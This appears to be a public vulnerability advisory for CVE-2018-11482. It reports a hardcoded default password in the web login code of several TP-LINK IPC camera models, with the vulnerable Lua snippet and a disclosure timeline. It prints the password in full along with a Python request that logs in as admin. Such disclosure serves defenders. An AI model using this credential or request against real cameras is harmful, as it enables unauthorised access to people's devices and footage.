-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathTP-LINK-login-Escalation-of-Privileges
86 lines (61 loc) · 2.05 KB
/
TP-LINK-login-Escalation-of-Privileges
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
[Suggested description]
/usr/lib/lua/luci/websys.lua on TP-LINK IPC TL-IPC223(P)-6,
TL-IPC323K-D, TL-IPC325(KP)-*, and TL-IPC40A-4 devices has a hardcoded factory
zMiVw8Kw0oxKXL0 password. Nearly All devices on the Internet(more then 10000) can be directly
login success,which lead to escalation of privileges and information disclosure.
------------------------------------------
[Additional Information]
Hard Coded Password in TP-LINK IPC Camera leading to Escalation of Privileges and Information Disclosure
------------------------------------------
[Vulnerability Type]
Incorrect Access Control
------------------------------------------
[Vendor of Product]
TP-LINK
------------------------------------------
[Affected Product Code Base]
TP-LINK IPC Camera - TL-IPC325(KP)-*
TP-LINK IPC Camera - TL-IPC323K-D *
TP-link IPC Camera - TL-IPC40A-4 *
TP-LINK IPC Camera - TL-IPC223(P)-6 *
------------------------------------------
[Affected Component]
/usr/lib/lua/luci/websys.lua:
DEFAULT_PWD = "zMiVw8Kw0oxKXL0"
...
skip
...
if not e then
return true
end
if e == DEFAULT_PWD then
return true
...
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
headers = {"Content-Type":"application/json; charset=UTF-8"}
r = requests.post("http://%s/"%ip, '{"method":"do","login":{"username":"admin","password":"zMiVw8Kw0oxKXL0"}}', headers = headers)
ret = json.loads(r.text)
------------------------------------------
[Reference]
http://service.tp-link.com.cn/detail_download_5471.html(official firmware)
https://www.tp-link.com/us/security
------------------------------------------
[Discoverer]
dbappsecurity
[Timeline]
2018-02-01 Find Vuln.
2018-02-02 Try to contact TP-Link China ...
2018-05-24 Failed To contact TP-Link China.
2018-05-25 Submit to CVE mitre.
2018-05-26 Got CVE-2018-11482.
2018-05-28 Make public.